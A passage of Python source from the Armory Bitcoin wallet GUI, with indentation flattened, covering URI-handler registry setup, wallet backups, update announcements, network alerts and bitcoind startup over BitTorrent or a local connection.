self.writeSetting('DNAA_DefaultApp', True)
self.writeSetting('AlwaysArmoryURI', reply[0])
if reply[0]==True:
action = 'DoIt'
else:
LOGINFO('User requested not to use Armory as URI handler')
return
# Finally, do it if we're supposed to!
LOGINFO('URL-register action: %s', action)
if action=='DoIt':
LOGINFO('Registering Armory for current user')
baseDir = os.path.dirname(unicode(passstr[0:(rtlength*2)], encoding='utf16'))
regKeys = []
regKeys.append(['Software\\Classes\\bitcoin', '', 'URL:bitcoin Protocol'])
regKeys.append(['Software\\Classes\\bitcoin', 'URL Protocol', ""])
regKeys.append(['Software\\Classes\\bitcoin\\shell', '', None])
regKeys.append(['Software\\Classes\\bitcoin\\shell\\open', '', None])
for key,name,val in regKeys:
dkey = '%s\\%s' % (key,name)
LOGINFO('\tWriting key: [HKEY_CURRENT_USER\\] ' + dkey)
registryKey = CreateKey(HKEY_CURRENT_USER, key)
SetValueEx(registryKey, name, 0, REG_SZ, val)
CloseKey(registryKey)
regKeysU = []
regKeysU.append(['Software\\Classes\\bitcoin\\shell\\open\\command', '', \
modulepathname])
regKeysU.append(['Software\\Classes\\bitcoin\\DefaultIcon', '', \
'"%s\\armory48x48.ico"' % baseDir])
for key,name,val in regKeysU:
dkey = '%s\\%s' % (key,name)
LOGINFO('\tWriting key: [HKEY_CURRENT_USER\\] ' + dkey)
registryKey = CreateKey(HKEY_CURRENT_USER, key)
#hKey = ctypes.c_int(registryKey.handle)
#ctypes.windll.Advapi32.RegSetValueEx(hKey, None, 0, REG_SZ, val, (len(val)+1))
SetValueEx(registryKey, name, 0, REG_SZ, val)
CloseKey(registryKey)
#############################################################################
def warnNewUSTXFormat(self):
if not self.getSettingOrSetDefault('DNAA_Version092Warn', False):
reply = MsgBoxWithDNAA(self, self, MSGBOX.Warning, tr("Version Warning"), tr("""
Since Armory version 0.92 the formats for offline transaction
operations has changed to accommodate multi-signature
transactions. This format is <u>not</u> compatible with
versions of Armory before 0.92.
<br><br>
To continue, the other system will need to be upgraded to
to version 0.92 or later. If you cannot upgrade the other
system, you will need to reinstall an older version of Armory
on this system."""), dnaaMsg='Do not show this warning again')
self.writeSetting('DNAA_Version092Warn', reply[1])
#############################################################################
def execOfflineTx(self):
self.warnNewUSTXFormat()
dlgSelect = DlgOfflineSelect(self, self)
if dlgSelect.exec_():
# If we got here, one of three buttons was clicked.
if dlgSelect.do_create:
DlgSendBitcoins(self.getSelectedWallet(), self, self,
onlyOfflineWallets=True).exec_()
elif dlgSelect.do_broadc:
DlgSignBroadcastOfflineTx(self,self).exec_()
#############################################################################
def sizeHint(self):
return QSize(1000, 650)
#############################################################################
def openToolsDlg(self):
QMessageBox.information(self, 'No Tools Yet!', \
'The developer tools are not available yet, but will be added '
'soon. Regardless, developer-mode still offers lots of '
'extra information and functionality that is not available in '
'Standard or Advanced mode.', QMessageBox.Ok)
#############################################################################
def execIntroDialog(self):
if not self.getSettingOrSetDefault('DNAA_IntroDialog', False):
dlg = DlgIntroMessage(self, self)
result = dlg.exec_()
if dlg.chkDnaaIntroDlg.isChecked():
self.writeSetting('DNAA_IntroDialog', True)
if dlg.requestCreate:
self.startWalletWizard()
if dlg.requestImport:
self.execImportWallet()
#############################################################################
def makeWalletCopy(self, parent, wlt, copyType='Same', suffix='', changePass=False):
'''Create a digital backup of your wallet.'''
if changePass:
LOGERROR('Changing password is not implemented yet!')
raise NotImplementedError
# Set the file name.
if copyType.lower()=='pkcc':
fn = 'armory_%s.%s' % (wlt.uniqueIDB58, suffix)
else:
fn = 'armory_%s_%s.wallet' % (wlt.uniqueIDB58, suffix)
if wlt.watchingOnly and copyType.lower() != 'pkcc':
fn = 'armory_%s_%s_WatchOnly.wallet' % (wlt.uniqueIDB58, suffix)
savePath = unicode(self.getFileSave(defaultFilename=fn,
ffilter=[tr('Root Pubkey Text Files (*.rootpubkey)')]))
if not len(savePath)>0:
return False
# Create the file based on the type you want.
if copyType.lower()=='same':
wlt.writeFreshWalletFile(savePath)
elif copyType.lower()=='decrypt':
if wlt.useEncryption:
dlg = DlgUnlockWallet(wlt, parent, self, 'Unlock Private Keys')
if not dlg.exec_():
return False
# Wallet should now be unlocked
wlt.makeUnencryptedWalletCopy(savePath)
elif copyType.lower()=='encrypt':
newPassphrase=None
if not wlt.useEncryption:
dlgCrypt = DlgChangePassphrase(parent, self, not wlt.useEncryption)
if not dlgCrypt.exec_():
QMessageBox.information(parent, tr('Aborted'), tr("""
No passphrase was selected for the encrypted backup.
No backup was created"""), QMessageBox.Ok)
newPassphrase = SecureBinaryData(str(dlgCrypt.edtPasswd1.text()))
wlt.makeEncryptedWalletCopy(savePath, newPassphrase)
elif copyType.lower() == 'pkcc':
wlt.writePKCCFile(savePath)
else:
LOGERROR('Invalid "copyType" supplied to makeWalletCopy: %s', copyType)
return False
QMessageBox.information(parent, tr('Backup Complete'), tr("""
Your wallet was successfully backed up to the following
location:<br><br>%s""") % savePath, QMessageBox.Ok)
return True
#############################################################################
def createAction(self, txt, slot, isCheckable=False, \
ttip=None, iconpath=None, shortcut=None):
"""
Modeled from the "Rapid GUI Programming with Python and Qt" book, page 174
"""
icon = QIcon()
if iconpath:
icon = QIcon(iconpath)
theAction = QAction(icon, txt, self)
if isCheckable:
theAction.setCheckable(True)
self.connect(theAction, SIGNAL('toggled(bool)'), slot)
else:
self.connect(theAction, SIGNAL('triggered()'), slot)
if ttip:
theAction.setToolTip(ttip)
theAction.setStatusTip(ttip)
if shortcut:
theAction.setShortcut(shortcut)
return theAction
#############################################################################
def setUserMode(self, mode):
LOGINFO('Changing usermode:')
LOGINFO(' From: %s', self.settings.get('User_Mode'))
self.usermode = mode
if mode==USERMODE.Standard:
self.writeSetting('User_Mode', 'Standard')
if mode==USERMODE.Advanced:
self.writeSetting('User_Mode', 'Advanced')
if mode==USERMODE.Expert:
self.writeSetting('User_Mode', 'Expert')
LOGINFO(' To: %s', self.settings.get('User_Mode'))
if not self.firstModeSwitch:
QMessageBox.information(self,'Restart Armory', \
'You may have to restart Armory for all aspects of '
'the new usermode to go into effect.', QMessageBox.Ok)
self.firstModeSwitch = False
#############################################################################
def getPreferredDateFormat(self):
# Treat the format as "binary" to make sure any special symbols don't
# interfere with the SettingsFile symbols
globalDefault = binary_to_hex(DEFAULT_DATE_FORMAT)
fmt = self.getSettingOrSetDefault('DateFormat', globalDefault)
return hex_to_binary(str(fmt)) # short hex strings could look like int()
#############################################################################
def setPreferredDateFormat(self, fmtStr):
# Treat the format as "binary" to make sure any special symbols don't
# interfere with the SettingsFile symbols
try:
unixTimeToFormatStr(1000000000, fmtStr)
except:
QMessageBox.warning(self, 'Invalid Date Format', \
'The date format you specified was not valid. Please re-enter '
'it using only the strftime symbols shown in the help text.', \
QMessageBox.Ok)
return False
self.writeSetting('DateFormat', binary_to_hex(fmtStr))
return True
#############################################################################
def setupAnnouncementFetcher(self):
# Decide if disable OS/version reporting sent with announce fetches
skipStats1 = self.getSettingOrSetDefault('SkipStatsReport', False)
skipStats2 = CLI_OPTIONS.skipStatsReport
self.skipStatsReport = skipStats1 or skipStats2
# This determines if we should disable all of it
skipChk1 = self.getSettingOrSetDefault('SkipAnnounceCheck', False)
skipChk2 = CLI_OPTIONS.skipAnnounceCheck
skipChk3 = CLI_OPTIONS.offline and not CLI_OPTIONS.testAnnounceCode
skipChk4 = CLI_OPTIONS.useTorSettings
skipChk5 = self.getSettingOrSetDefault('UseTorSettings', False)
self.skipAnnounceCheck = \
skipChk1 or skipChk2 or skipChk3 or skipChk4 or skipChk5
url1 = ANNOUNCE_URL
url2 = ANNOUNCE_URL_BACKUP
fetchPath = os.path.join(ARMORY_HOME_DIR, 'atisignedannounce')
if self.announceFetcher is None:
# We keep an ID in the settings file that can be used by ATI's
# statistics aggregator to remove duplicate reports. We store
# the month&year that the ID was generated, so that we can change
# it every month for privacy reasons
idData = self.getSettingOrSetDefault('MonthlyID', '0000_00000000')
storedYM,currID = idData.split('_')
monthyear = unixTimeToFormatStr(RightNow(), '%m%y')
if not storedYM == monthyear:
currID = SecureBinaryData().GenerateRandom(4).toHexStr()
self.settings.set('MonthlyID', '%s_%s' % (monthyear, currID))
self.announceFetcher = AnnounceDataFetcher(url1, url2, fetchPath, currID)
self.announceFetcher.setStatsDisable(self.skipStatsReport)
self.announceFetcher.setFullyDisabled(self.skipAnnounceCheck)
self.announceFetcher.start()
# Set last-updated vals to zero to force processing at startup
for fid in ['changelog, downloads','notify','bootstrap']:
self.lastAnnounceUpdate[fid] = 0
# If we recently updated the settings to enable or disable checking...
if not self.announceFetcher.isRunning() and not self.skipAnnounceCheck:
self.announceFetcher.setFullyDisabled(False)
self.announceFetcher.setFetchInterval(DEFAULT_FETCH_INTERVAL)
self.announceFetcher.start()
elif self.announceFetcher.isRunning() and self.skipAnnounceCheck:
self.announceFetcher.setFullyDisabled(True)
self.announceFetcher.shutdown()
#############################################################################
def processAnnounceData(self, forceCheck=False, forceWait=5):
adf = self.announceFetcher
# The ADF always fetches everything all the time. If forced, do the
# regular fetch first, then examine the individual files without forcing
if forceCheck:
adf.fetchRightNow(forceWait)
# Check each of the individual files for recent modifications
idFuncPairs = [
['announce', self.updateAnnounceTab],
['changelog', self.processChangelog],
['downloads', self.processDownloads],
['notify', self.processNotifications],
['bootstrap', self.processBootstrap] ]
# If modified recently
for fid,func in idFuncPairs:
if not fid in self.lastAnnounceUpdate or \
adf.getFileModTime(fid) > self.lastAnnounceUpdate[fid]:
self.lastAnnounceUpdate[fid] = RightNow()
fileText = adf.getAnnounceFile(fid)
func(fileText)
#############################################################################
def processAlerts(self):
# display to the user any alerts that came in through the bitcoin
# network
if self.NetworkingFactory == None:
return
factory = self.NetworkingFactory
armoryClient = factory.getProto()
if armoryClient is None:
return
alerts = armoryClient.alerts
try:
peerInfo = armoryClient.peerInfo
except:
LOGERROR("failed to process alerts from bitcoind")
return
for id, alert in alerts.items():
if self.ignoreAlerts.get(id):
continue
if time.time() > alert.expiration:
continue
if peerInfo["version"] < alert.minVersion \
or peerInfo["version"] > alert.maxVersion:
continue
if peerInfo["subver"] not in alert.subVerSet:
continue
title = "Bitcoin alert %s" % alert.uniqueID
alert_str = "%s<br>%s<br>%s<br>" % (alert.statusBar, alert.comment, alert.reserved)
msg = "This alert has been received from the bitcoin network:<p>" + \
alert_str + \
"</p>Please visit <a href='http://www.bitcoin.org/en/alerts'>http://www.bitcoin.org/en/alerts</a> for more information.<br>"
reply, self.ignoreAlerts[id] = MsgBoxWithDNAA(
self, self, MSGBOX.Warning, title, msg,
'Do not show me this notification again', yesStr='OK')
self.writeSetting('IgnoreAlerts', ",".join([str(i) for i in self.ignoreAlerts.keys()]))
#############################################################################
def processChangelog(self, txt):
try:
clp = changelogParser()
self.changelog = clp.parseChangelogText(txt)
except:
# Don't crash on an error, but do log what happened
LOGEXCEPT('Failed to parse changelog data')
#############################################################################
def processDownloads(self, txt):
try:
dlp = downloadLinkParser()
self.downloadLinks = dlp.parseDownloadList(txt)
if self.downloadLinks is None:
return
thisVer = getVersionInt(BTCARMORY_VERSION)
# Check ARMORY versions
if not 'Armory' in self.downloadLinks:
LOGWARN('No Armory links in the downloads list')
else:
maxVer = 0
self.versionNotification = {}
for verStr,vermap in self.downloadLinks['Armory'].iteritems():
dlVer = getVersionInt(readVersionString(verStr))
if dlVer > maxVer:
maxVer = dlVer
self.armoryVersions[1] = verStr
if thisVer >= maxVer:
continue
shortDescr = tr('Armory version %s is now available!') % verStr
notifyID = binary_to_hex(hash256(shortDescr)[:4])
self.versionNotification['UNIQUEID'] = notifyID
self.versionNotification['VERSION'] = '0'
self.versionNotification['STARTTIME'] = '0'
self.versionNotification['EXPIRES'] = '%d' % long(UINT64_MAX)
self.versionNotification['CANCELID'] = '[]'
self.versionNotification['MINVERSION'] = '*'
self.versionNotification['MAXVERSION'] = '<%s' % verStr
self.versionNotification['PRIORITY'] = '3072'
self.versionNotification['ALERTTYPE'] = 'Upgrade'
self.versionNotification['NOTIFYSEND'] = 'False'
self.versionNotification['NOTIFYRECV'] = 'False'
self.versionNotification['SHORTDESCR'] = shortDescr
self.versionNotification['LONGDESCR'] = \
self.getVersionNotifyLongDescr(verStr).replace('\n','<br>')
if 'ArmoryTesting' in self.downloadLinks:
for verStr,vermap in self.downloadLinks['ArmoryTesting'].iteritems():
dlVer = getVersionInt(readVersionString(verStr))
if dlVer > maxVer:
maxVer = dlVer
self.armoryVersions[1] = verStr
if thisVer >= maxVer:
continue
shortDescr = tr('Armory Testing version %s is now available!') % verStr
notifyID = binary_to_hex(hash256(shortDescr)[:4])
self.versionNotification['UNIQUEID'] = notifyID
self.versionNotification['VERSION'] = '0'
self.versionNotification['STARTTIME'] = '0'
self.versionNotification['EXPIRES'] = '%d' % long(UINT64_MAX)
self.versionNotification['CANCELID'] = '[]'
self.versionNotification['MINVERSION'] = '*'
self.versionNotification['MAXVERSION'] = '<%s' % verStr
self.versionNotification['PRIORITY'] = '1024'
self.versionNotification['ALERTTYPE'] = 'upgrade-testing'
self.versionNotification['NOTIFYSEND'] = 'False'
self.versionNotification['NOTIFYRECV'] = 'False'
self.versionNotification['SHORTDESCR'] = shortDescr
self.versionNotification['LONGDESCR'] = \
self.getVersionNotifyLongDescr(verStr, True).replace('\n','<br>')
# For Satoshi updates, we don't trigger any notifications like we
# do for Armory above -- we will release a proper announcement if
# necessary. But we want to set a flag to
if not 'Satoshi' in self.downloadLinks:
LOGWARN('No Satoshi links in the downloads list')
else:
try:
maxVer = 0
for verStr,vermap in self.downloadLinks['Satoshi'].iteritems():
dlVer = getVersionInt(readVersionString(verStr))
if dlVer > maxVer:
maxVer = dlVer
self.satoshiVersions[1] = verStr
if not self.NetworkingFactory:
return
# This is to detect the running versions of Bitcoin-Qt/bitcoind
if self.NetworkingFactory.getProto():
thisVerStr = self.NetworkingFactory.getProto().peerInfo['subver']
thisVerStr = thisVerStr.strip('/').split(':')[-1]
if sum([0 if c in '0123456789.' else 1 for c in thisVerStr]) > 0:
return
self.satoshiVersions[0] = thisVerStr
else:
return
except:
pass
except:
# Don't crash on an error, but do log what happened
LOGEXCEPT('Failed to parse download link data')
#############################################################################
def getVersionNotifyLongDescr(self, verStr, testing=False):
shortOS = None
if OS_WINDOWS:
shortOS = 'windows'
elif OS_LINUX:
shortOS = 'ubuntu'
elif OS_MACOSX:
shortOS = 'mac'
webURL = 'https://bitcoinarmory.com/download/'
if shortOS is not None:
webURL += '#' + shortOS
if testing:
return tr("""
A new testing version of Armory is out. You can upgrade to version
%(ver)s through our secure downloader inside Armory (link at the bottom
of this notification window).
""") % { 'ver' : verStr}
return tr("""
Your version of Armory is now outdated. Please upgrade to version
%(ver)s through our secure downloader inside Armory (link at the bottom
of this notification window). Alternatively, you can get the new
version from our website downloads page at:
<br><br>
<a href="%(url)s">%(url)s</a> """) % {'ver' : verStr, 'url' : webURL}
#############################################################################
def processBootstrap(self, binFile):
# Nothing to process, actually. We'll grab the bootstrap from its
# current location, if needed
pass
#############################################################################
def notificationIsRelevant(self, notifyID, notifyMap):
currTime = RightNow()
thisVerInt = getVersionInt(BTCARMORY_VERSION)
# Ignore transactions below the requested priority
minPriority = self.getSettingOrSetDefault('NotifyMinPriority', 2048)
if int(notifyMap['PRIORITY']) < minPriority:
return False
# Ignore version upgrade notifications if disabled in the settings
if 'upgrade' in notifyMap['ALERTTYPE'].lower() and \
self.getSettingOrSetDefault('DisableUpgradeNotify', False):
return False
if notifyID in self.notifyIgnoreShort:
return False
if notifyMap['STARTTIME'].isdigit():
if currTime < long(notifyMap['STARTTIME']):
return False
if notifyMap['EXPIRES'].isdigit():
if currTime > long(notifyMap['EXPIRES']):
return False
try:
minVerStr = notifyMap['MINVERSION']
minExclude = minVerStr.startswith('>')
minVerStr = minVerStr[1:] if minExclude else minVerStr
minVerInt = getVersionInt(readVersionString(minVerStr))
minVerInt += 1 if minExclude else 0
if thisVerInt < minVerInt:
return False
except:
pass
try:
maxVerStr = notifyMap['MAXVERSION']
maxExclude = maxVerStr.startswith('<')
maxVerStr = maxVerStr[1:] if maxExclude else maxVerStr
maxVerInt = getVersionInt(readVersionString(maxVerStr))
maxVerInt -= 1 if maxExclude else 0
if thisVerInt > maxVerInt:
return False
except:
pass
return True
#############################################################################
def processNotifications(self, txt):
# Keep in mind this will always be run on startup with a blank slate, as
# well as every 30 min while Armory is running. All notifications are
# "new" on startup (though we will allow the user to do-not-show-again
# and store the notification ID in the settings file).
try:
np = notificationParser()
currNotificationList = np.parseNotificationText(txt)
except:
# Don't crash on an error, but do log what happened
LOGEXCEPT('Failed to parse notifications')
if currNotificationList is None:
currNotificationList = {}
# If we have a new-version notification, it's not ignroed, and such
# notifications are not disabled, add it to the list
vnotify = self.versionNotification
if vnotify and 'UNIQUEID' in vnotify:
currNotificationList[vnotify['UNIQUEID']] = deepcopy(vnotify)
# Create a copy of almost all the notifications we have.
# All notifications >= 2048, unless they've explictly allowed testing
# notifications. This will be shown on the "Announcements" tab.
self.almostFullNotificationList = {}
currMin = self.getSettingOrSetDefault('NotifyMinPriority', \
DEFAULT_MIN_PRIORITY)
minmin = min(currMin, DEFAULT_MIN_PRIORITY)
for nid,valmap in currNotificationList.iteritems():
if int(valmap['PRIORITY']) >= minmin:
self.almostFullNotificationList[nid] = deepcopy(valmap)
tabPriority = 0
self.maxPriorityID = None
# Check for new notifications
addedNotifyIDs = set()
irrelevantIDs = set()
for nid,valmap in currNotificationList.iteritems():
if not self.notificationIsRelevant(nid, valmap):
# Can't remove while iterating over the map
irrelevantIDs.add(nid)
self.notifyIgnoreShort.add(nid)
continue
if valmap['PRIORITY'].isdigit():
if int(valmap['PRIORITY']) > tabPriority:
tabPriority = int(valmap['PRIORITY'])
self.maxPriorityID = nid
if not nid in self.almostFullNotificationList:
addedNotifyIDs.append(nid)
# Now remove them from the set that we are working with
for nid in irrelevantIDs:
del currNotificationList[nid]
# Check for notifications we had before but no long have
removedNotifyIDs = []
for nid,valmap in self.almostFullNotificationList.iteritems():
if not nid in currNotificationList:
removedNotifyIDs.append(nid)
#for nid in removedNotifyIDs:
#self.notifyIgnoreShort.discard(nid)
#self.notifyIgnoreLong.discard(nid)
# Change the "Announcements" tab color if something important is there
tabWidgetBar = self.mainDisplayTabs.tabBar()
tabColor = Colors.Foreground
if tabPriority >= 5120:
tabColor = Colors.TextRed
elif tabPriority >= 4096:
tabColor = Colors.TextRed
elif tabPriority >= 3072:
tabColor = Colors.TextBlue
elif tabPriority >= 2048:
tabColor = Colors.TextBlue
tabWidgetBar.setTabTextColor(self.MAINTABS.Announce, tabColor)
self.updateAnnounceTab()
# We only do popups for notifications >=4096, AND upgrade notify
if tabPriority >= 3072:
DlgNotificationWithDNAA(self, self, self.maxPriorityID, \
currNotificationList[self.maxPriorityID]).show()
elif vnotify:
if not vnotify['UNIQUEID'] in self.notifyIgnoreShort:
DlgNotificationWithDNAA(self,self,vnotify['UNIQUEID'],vnotify).show()
#############################################################################
def setupNetworking(self):
LOGINFO('Setting up networking...')
# Prevent Armory from being opened twice
from twisted.internet import reactor
import twisted
def uriClick_partial(a):
self.uriLinkClicked(a)
if CLI_OPTIONS.interport > 1:
try:
self.InstanceListener = ArmoryListenerFactory(self.bringArmoryToFront, \
uriClick_partial )
reactor.listenTCP(CLI_OPTIONS.interport, self.InstanceListener)
except twisted.internet.error.CannotListenError:
LOGWARN('Socket already occupied! This must be a duplicate Armory')
QMessageBox.warning(self, tr('Already Open'), tr("""
Armory is already running! You can only have one Armory open
at a time. Exiting..."""), QMessageBox.Ok)
os._exit(0)
else:
LOGWARN('*** Listening port is disabled. URI-handling will not work')
settingSkipCheck = self.getSettingOrSetDefault('SkipOnlineCheck', False)
useTor = self.getSettingOrSetDefault('UseTorSettings', False)
# Check general internet connection
self.internetStatus = isInternetAvailable(forceOnline =
CLI_OPTIONS.forceOnline or settingSkipCheck or useTor)
LOGINFO('Internet status: %s', self.internetStatus)
#############################################################################
def manageBitcoindAskTorrent(self):
if not satoshiIsAvailable():
reply = MsgBoxCustom(MSGBOX.Question, tr('BitTorrent Option'), tr("""
You are currently configured to run the core Bitcoin software
yourself (Bitcoin-Qt or bitcoind). <u>Normally</u>, you should
start the Bitcoin software first and wait for it to synchronize
with the network before starting Armory.
<br><br>
<b>However</b>, Armory can shortcut most of this initial
synchronization
for you using BitTorrent. If your firewall allows it,
using BitTorrent can be an order of magnitude faster (2x to 20x)
than letting the Bitcoin software download it via P2P.
<br><br>
<u>To synchronize using BitTorrent (recommended):</u>
Click "Use BitTorrent" below, and <u>do not</u> start the Bitcoin
software until after it is complete.
<br><br>
<u>To synchronize using Bitcoin P2P (fallback):</u>
Click "Cancel" below, then close Armory and start Bitcoin-Qt
(or bitcoind). Do not start Armory until you see a green checkmark
in the bottom-right corner of the Bitcoin-Qt window."""), \
wCancel=True, yesStr='Use BitTorrent')
if not reply:
QMessageBox.warning(self, tr('Synchronize'), tr("""
When you are ready to start synchronization, close Armory and
start Bitcoin-Qt or bitcoind. Restart Armory only when
synchronization is complete. If using Bitcoin-Qt, you will see
a green checkmark in the bottom-right corner"""), QMessageBox.Ok)
return False
else:
reply = MsgBoxCustom(MSGBOX.Question, tr('BitTorrent Option'), tr("""
You are currently running the core Bitcoin software, but it
is not fully synchronized with the network, yet. <u>Normally</u>,
you should close Armory until Bitcoin-Qt (or bitcoind) is
finished
<br><br>
<b><u>However</u></b>, Armory can speed up this initial
synchronization for you using BitTorrent. If your firewall
allows it, using BitTorrent can be an order of magnitude
faster (2x to 20x)
than letting the Bitcoin software download it via P2P.
<br><br>
<u>To synchronize using BitTorrent (recommended):</u>
Close the running Bitcoin software <b>right now</b>. When it is
closed, click "Use BitTorrent" below. Restart the Bitcoin software
when Armory indicates it is complete.
<br><br>
<u>To synchronize using Bitcoin P2P (fallback):</u>
Click "Cancel" below, and then close Armory until the Bitcoin
software is finished synchronizing. If using Bitcoin-Qt, you
will see a green checkmark in the bottom-right corner of the
main window."""), QMessageBox.Ok)
if reply:
if satoshiIsAvailable():
QMessageBox.warning(self, tr('Still Running'), tr("""
The Bitcoin software still appears to be open!
Close it <b>right now</b>
before clicking "Ok." The BitTorrent engine will start
as soon as you do."""), QMessageBox.Ok)
else:
QMessageBox.warning(self, tr('Synchronize'), tr("""
You chose to finish synchronizing with the network using
the Bitcoin software which is already running. Please close
Armory until it is finished. If you are running Bitcoin-Qt,
you will see a green checkmark in the bottom-right corner,
when it is time to open Armory again."""), QMessageBox.Ok)
return False
return True
############################################################################
def findTorrentFileForSDM(self, forceWaitTime=0):
"""
Hopefully the announcement fetcher has already gotten one for us,
or at least we have a default.
"""
# Only do an explicit announce check if we have no bootstrap at all
# (don't need to spend time doing an explicit check if we have one)
if self.announceFetcher.getFileModTime('bootstrap') == 0:
if forceWaitTime>0:
self.explicitCheckAnnouncements(forceWaitTime)
# If it's still not there, look for a default file
if self.announceFetcher.getFileModTime('bootstrap') == 0:
LOGERROR('Could not get announce bootstrap; using default')
srcTorrent = os.path.join(GetExecDir(), 'default_bootstrap.torrent')
else:
srcTorrent = self.announceFetcher.getAnnounceFilePath('bootstrap')
# Maybe we still don't have a torrent for some reason
if not srcTorrent or not os.path.exists(srcTorrent):
return ''
torrentPath = os.path.join(ARMORY_HOME_DIR, 'bootstrap.dat.torrent')
LOGINFO('Using torrent file: ' + torrentPath)
shutil.copy(srcTorrent, torrentPath)
return torrentPath
############################################################################
def startBitcoindIfNecessary(self):
LOGINFO('startBitcoindIfNecessary')
if self.internetStatus == INTERNET_STATUS.Unavailable or CLI_OPTIONS.offline:
LOGWARN('Not online, will not start bitcoind')
return False
if not self.doAutoBitcoind:
LOGWARN('Tried to start bitcoind, but ManageSatoshi==False')
return False
if satoshiIsAvailable():
LOGWARN('Tried to start bitcoind, but satoshi already running')
return False
self.setSatoshiPaths()
TheSDM.setDisabled(False)
torrentIsDisabled = self.getSettingOrSetDefault('DisableTorrent', False)
# Give the SDM the torrent file...it will use it if it makes sense
if not torrentIsDisabled and TheSDM.shouldTryBootstrapTorrent():
torrentFile = self.findTorrentFileForSDM(2)
if not torrentFile or not os.path.exists(torrentFile):
LOGERROR('Could not find torrent file')
else:
TheSDM.tryToSetupTorrentDL(torrentFile)
try:
# "satexe" is actually just the install directory, not the direct
# path the executable. That dir tree will be searched for bitcoind
TheSDM.setupSDM(extraExeSearch=self.satoshiExeSearchPath)
TheSDM.startBitcoind(self.notifyBitcoindIsReady)
LOGDEBUG('Bitcoind started without error')
return True
except:
LOGEXCEPT('Failed to setup SDM')
self.switchNetworkMode(NETWORKMODE.Offline)
############################################################################
def notifyBitcoindIsReady(self):
self.emit(SIGNAL('method_signal'), self.proceedOnceBitcoindIsReady)
############################################################################
def proceedOnceBitcoindIsReady(self):
self.loadBlockchainIfNecessary()
self.setDashboardDetails()
############################################################################
def setSatoshiPaths(self):
LOGINFO('setSatoshiPaths')
# We skip the getSettingOrSetDefault call, because we don't want to set
# it if it doesn't exist
if self.settings.hasSetting('SatoshiExe'):
if not os.path.exists(self.settings.get('SatoshiExe')):
LOGERROR('Bitcoin installation setting is a non-existent directory')
self.satoshiExeSearchPath = [self.settings.get('SatoshiExe')]
else:
self.satoshiExeSearchPath = []
self.satoshiHomePath = BTC_HOME_DIR
if self.settings.hasSetting('SatoshiDatadir') and \
CLI_OPTIONS.satoshiHome==DEFAULT:
# Setting override BTC_HOME_DIR only if it wasn't explicitly
# set as the command line.
self.satoshiHomePath = self.settings.get('SatoshiDatadir')
LOGINFO('Setting satoshi datadir = %s' % self.satoshiHomePath)
TheBDM.setSatoshiDir(self.satoshiHomePath)
TheSDM.setSatoshiDir(self.satoshiHomePath)
TheTDM.setSatoshiDir(self.satoshiHomePath)
############################################################################
# This version of online mode is possible doesn't check the internet everytime
def isOnlineModePossible(self):
return self.internetStatus != INTERNET_STATUS.Unavailable and \
satoshiIsAvailable() and \
os.path.exists(os.path.join(TheBDM.btcdir, 'blocks'))
############################################################################
def loadBlockchainIfNecessary(self):
LOGINFO('loadBlockchainIfNecessary')
if CLI_OPTIONS.offline:
self.switchNetworkMode(NETWORKMODE.Offline)
elif self.isOnlineModePossible():
# Track number of times we start loading the blockchain.
# We will decrement the number when loading finishes
# We can use this to detect problems with mempool or blkxxxx.dat
self.numTriesOpen = self.getSettingOrSetDefault('FailedLoadCount', 0)
if self.numTriesOpen>2:
self.loadFailedManyTimesFunc(self.numTriesOpen)
self.settings.set('FailedLoadCount', self.numTriesOpen+1)
self.switchNetworkMode(NETWORKMODE.Full)
TheBDM.goOnline()
else:
self.switchNetworkMode(NETWORKMODE.Offline)
#############################################################################
def switchNetworkMode(self, newMode):
LOGINFO('Setting netmode: %s', newMode)
self.netMode=newMode
if newMode in (NETWORKMODE.Offline, NETWORKMODE.Disconnected):
self.NetworkingFactory = FakeClientFactory()
elif newMode==NETWORKMODE.Full:
self.NetworkingFactory = self.getSingletonConnectedNetworkingFactory()
return
#############################################################################
def getSingletonConnectedNetworkingFactory(self):
if not self.SingletonConnectedNetworkingFactory:
# ArmoryClientFactory auto-reconnects, so add the connection
# the very first time and never afterwards.
# Actually setup the networking, now
from twisted.internet import reactor
def showOfflineMsg():
self.netMode = NETWORKMODE.Disconnected
self.setDashboardDetails()
self.lblArmoryStatus.setText( \
'<font color=%s><i>Disconnected</i></font>' % htmlColor('TextWarn'))
if not self.getSettingOrSetDefault('NotifyDiscon', True):
return
try:
self.showTrayMsg('Disconnected', 'Connection to Bitcoin-Qt ' \
'client lost! Armory cannot send nor ' \
'receive bitcoins until connection is ' \
're-established.', QSystemTrayIcon.Critical, \
10000)
except:
LOGEXCEPT('Failed to show disconnect notification')
self.connectCount = 0
def showOnlineMsg():
self.netMode = NETWORKMODE.Full
self.setDashboardDetails()
self.lblArmoryStatus.setText(\
'<font color=%s>Connected (%s blocks)</font> ' %
(htmlColor('TextGreen'), TheBDM.getTopBlockHeight()))
if not self.getSettingOrSetDefault('NotifyReconn', True):
return
try:
if self.connectCount>0:
self.showTrayMsg('Connected', 'Connection to Bitcoin-Qt ' \
're-established', \
QSystemTrayIcon.Information, 10000)
self.connectCount += 1
except:
LOGEXCEPT('Failed to show reconnect notification')
self.SingletonConnectedNetworkingFactory = ArmoryClientFactory(
TheBDM,
func_loseConnect=showOfflineMsg,
func_madeConnect=showOnlineMsg,
func_newTx=self.newTxFunc)
reactor.callWhenRunning(reactor.connectTCP, '127.0.0.1',
BITCOIN_PORT,
self.SingletonConnectedNetworkingFactory)
return self.SingletonConnectedNetworkingFactory
#############################################################################
def newTxFunc(self, pytxObj):
if TheBDM.getState() in (BDM_OFFLINE,BDM_UNINITIALIZED) or self.doShutdown:
return
TheBDM.bdv().addNewZeroConfTx(pytxObj.serialize(), long(RightNow()), True)
# All extra tx functions take one arg: the PyTx object of the new ZC tx
for txFunc in self.extraNewTxFunctions:
txFunc(pytxObj)
#############################################################################
def parseUriLink(self, uriStr, clickOrEnter='click'):
if len(uriStr) < 1:
QMessageBox.critical(self, 'No URL String', \
'You have not entered a URL String yet. '
'Please go back and enter a URL String.', \
QMessageBox.Ok)
return {}
ClickOrEnter = clickOrEnter[0].upper() + clickOrEnter[1:]
LOGINFO('URI link clicked!')
LOGINFO('The following URI string was parsed:')
LOGINFO(uriStr.replace('%','%%'))
try:
uriDict = parseBitcoinURI(uriStr)
except:
# malformed uri, make the dict empty, which will trigger the warning
uriDict = {}
if TheBDM.getState() in (BDM_OFFLINE,BDM_UNINITIALIZED):
LOGERROR('%sed "bitcoin:" link in offline mode.' % ClickOrEnter)
self.bringArmoryToFront()
QMessageBox.warning(self, 'Offline Mode',
'You %sed on a "bitcoin:" link, but Armory is in '
'offline mode, and is not capable of creating transactions. '
'%sing links will only work if Armory is connected '
